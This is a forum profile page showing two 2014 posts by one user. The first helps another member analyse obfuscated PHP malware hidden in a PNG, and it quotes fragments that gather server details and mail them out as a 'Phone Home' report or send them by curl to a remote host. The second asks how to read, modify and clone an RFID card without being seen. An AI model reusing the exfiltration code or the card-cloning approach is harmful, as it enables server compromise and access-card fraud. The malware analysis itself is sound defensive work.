Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - 0xDEADBEEF

Pages: [1]
1
Web Oriented Coding / Re: Malware inside png - using rsa2048 base64 md5 rot13
« on: January 06, 2014, 01:50:32 am »
I currently don't have much time to help you, it's about 1am and I need to get up early... But anyway.

Just take a look at some examples of the code where you can easily read some words:
Code: [Select]
preg_match("/<div id=\"serverList\" style=\"display: none\">(?<content>.*?)<\/div>/", $OQijXfnrxWxPIcPSUibKEFmLE, $NUwGojaMFrWOXnaoPPXmg);
$OQijXfnrxWxPIcPSUibKEFmLE = json_decode($NUwGojaMFrWOXnaoPPXmg['content'], true);
$oXyaqmHoChvHQFCvTluqmAC['servers'] = array_merge($OQijXfnrxWxPIcPSUibKEFmLE['servers'], $oXyaqmHoChvHQFCvTluqmAC['servers']);

       private function KZdGlovqEtKYUSCqSVnK()
       {
          $oXyaqmHoChvHQFCvTluqmAC = array();
          $oXyaqmHoChvHQFCvTluqmAC['host'] = $_SERVER['HTTP_HOST'];
          $oXyaqmHoChvHQFCvTluqmAC['page'] = $_SERVER['REQUEST_URI'];
          $oXyaqmHoChvHQFCvTluqmAC['ip'] = $_SERVER['SERVER_ADDR'];
          $oXyaqmHoChvHQFCvTluqmAC['eval'] = $this->YrCTrfUzBfsVJKvqiYUeFbc();
          $oXyaqmHoChvHQFCvTluqmAC['exec'] = $this->KNstTqErzZQBDQOODaJdLv();
          $oXyaqmHoChvHQFCvTluqmAC['serverKey'] = $this->BkISKDyWWRXScnLPbTlyI();
          $oXyaqmHoChvHQFCvTluqmAC['run'] = 0;
          $oXyaqmHoChvHQFCvTluqmAC['ver'] = 0.2;
          $oXyaqmHoChvHQFCvTluqmAC['started'] = date('Ymd');
          $oXyaqmHoChvHQFCvTluqmAC['last_connect'] = date('Ymd');
          $this->WbKPQMoSbMZkXUeYKXRIk = $oXyaqmHoChvHQFCvTluqmAC;
          return $oXyaqmHoChvHQFCvTluqmAC;
       }
          $dqkdbOJPzAPsLsuxnjAStdXUDis = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';

                mail($aJQafHDwnaPrCJrQMjHVh[$YwrSbZoVizxkPzSqHegTC], "Phone Home", json_encode($this->AeRxXNHxOXpcNJWlZSIKLhIw->bkBMtlOkGRaPFVExpcNbC(print_r($oXyaqmHoChvHQFCvTluqmAC, true) . print_r($_SERVER, true))));


             curl_setopt($SCvWTGyfCYyeLdjcFFzobk, CURLOPT_URL, "http://$gXNjWLFkUQOugyREMXKvZBfw");


Due to the preg_match, json and curl, to me it looks like someone is trying to analyse a Server list from a certain webpage.
As already said, I would start by renaming some functions and classes, but you need first to understand how OOP in PHP works before you can decode this. It's a lot of work, but it should not be impossible. Try to isolate classes and functions and understand their meaning. Take notes and then try to understand their relationship between each other. Don't to hesitate to recreate some functions by your own to see what they're doing. If you have a basic idea of the code, start to analyse the code in depth from a certain point. I would start at the URL and then trace back everything which is related to the URL. A well structured documentary is the key to decode this in my opinion.
Include also other variables like the place where you found this code. Maybe you could look in the environment to find some evidence of what it is doing.

And just before posting this, I have a mindblow. (Yes I know, it's late...) If you can parse the php file, it may connect to this webpage I highlighted above. Maybe you can sniff (MITM) connections between the parser and the webserver... It seems like you only have to change two class names and a few callbacks that the script runs...
The stage is yours ;)

3'735'928'559

2
Science / Read RFID Cards
« on: January 06, 2014, 12:58:00 am »
Hey guys, I need to read out an RFID Card and modify the card or create a modified copy of it.
I have never done something like this before and so I'm new in this field. I googled a lot but I only found a lot of old(2011,2012) articles with dead links.
One interesting presentation is this (just to share it with you): http://tech.mit.edu/V128/N30/subway/Defcon_Presentation.pdf
My first problem is an RFID Reader. I found some videos of Arduino and RFID attachments. But I don't want to work with Arduino, because I've never worked with hardware before and don't want to buy all that stuff and build a reader which may not work if I make a mistake... And later on lose all those expensive parts.
I found an interesting RFID Reader here: http://store.touchatag.com/acatalog/touchatag.html but they stopped selling them in 2012... I continued googling and found an article: http://hackaday.com/2013/02/16/turning-an-8-rfid-reader-into-something-useful/ which linked on this RFID Reader: http://dx.com/p/intelligent-id-card-usb-reader-174455
I also found another one here : http://proxmark3.com/ and then I found a second one on Deal Extreme : http://dx.com/p/125khz-rfid-card-copier-duplicator-with-writable-rfid-card-and-keychain-standalone-operation-17230
I don't want to spend too much money on a reader, because I don't know if I'm able to decrypt the data on the card and I don't know when I'm using the reader a second time... I would prefer the second one (proxmark3) but it's too expensive for a one time use. The third Card Copier/Duplicator looks interesting, if I only want to copy but I can't read the data and write modified data, or do you see any possibility to do this with this one? Would you recommend me the first reader(from Deal Extreme) or do you have any other suggestions? In a summary, I need an RFID reader which can read, I suppose, a 125Khz card and output the data on a computer. I would prefer a reader which can read any frequency but then the price starts rising... And of course, if I manage to read the data I need a writer to either rewrite, copy or create a card.

Is here someone with experience on reading RFID Chips? I'm pretty sure, that my data isn't much encrypted but if yes, do you think that it is possible to crack the encryption by "simply" collection data from a few cards(I can "get" some more) without sniffing the transfer between the chip and the reader(it is nearly impossible without being seen or filmed...) ? And of course, if you have any ideas or tutorials which might help me, I would be happy about it.
I'll keep you current so stay tuned!
3'735'928'559

Pages: [1]